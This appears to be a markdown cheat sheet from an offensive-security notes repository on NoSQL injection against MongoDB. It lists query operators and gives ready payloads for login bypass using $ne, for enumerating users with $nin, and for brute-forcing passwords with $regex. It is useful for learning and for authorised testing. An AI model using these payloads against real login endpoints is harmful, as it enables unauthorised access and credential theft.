whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Exploits/Databases/NoSQL Injection.md

2.4 KiB
Raw Permalink Blame History

NoSQL Injections

  • No tables, but files (collections)
  • Examples are Elasticsearch, MongoDB, Redis, CouchDB.

Here we are using MongoDB as an example. It is a file database using the following structure. Key & value pairs are stored in a file, which are grouped in a collections inside a database.

Querying

Operators

A precondition to the injection is to know the most common operators listed below.

$and
$or
$eq
$ne
$gt
$where
$exists
$regex

Filters

Filter data via using key value pairs inside arrays in the following syntactical style.

['user' => 'admin']
['age' => ['$gt' => '42']]

Injection

The payload is delivered inside the parameters of the request. To deliver malicious payload the operators can be negated. That means the for example all users except the known one used in the request is included in the response from the database server.

Pass HTTP parameter as an array instead of user= and password= visible in the following example.

user[$operator]=foo&password[$operator]=bar

Another method, login and concat all the users you'll find afterwards until every user has been listed in following way.

user[$nin][]=admin&password[$ne]=securepassword
user[$nin][]=admin&user[$nin][]=user2&password[$ne]=securepassword
user[$nin][]=admin&user[$nin][]=foouser&user[$nin][]=baruser&password[$ne]=securepassword

Examples

For example the filter including the operator $ne is the following.

['user'=>['$ne'=>'foo'],'password'=>['$ne'=>'bar']]

The body of a POST request would look like this following example.

user[$ne]=foo&password[$ne]=bar

POST or GET parameters are both possible.

username=admin&password[$ne]=admin

JSON

{"username":"user","password":{"$ne":""} }

Use regex to unravel the password. Check the length of the password and hopefully get a boolean if the length is correct, True or False. The return value may be an error a redirect or some other side channel to measure the respone with.

user=admin&pass[$regex]=^.{6}$

When you've found the correct length try bruteforcing the password via regex one char after another

user=admin&password[$regex]=^p.....$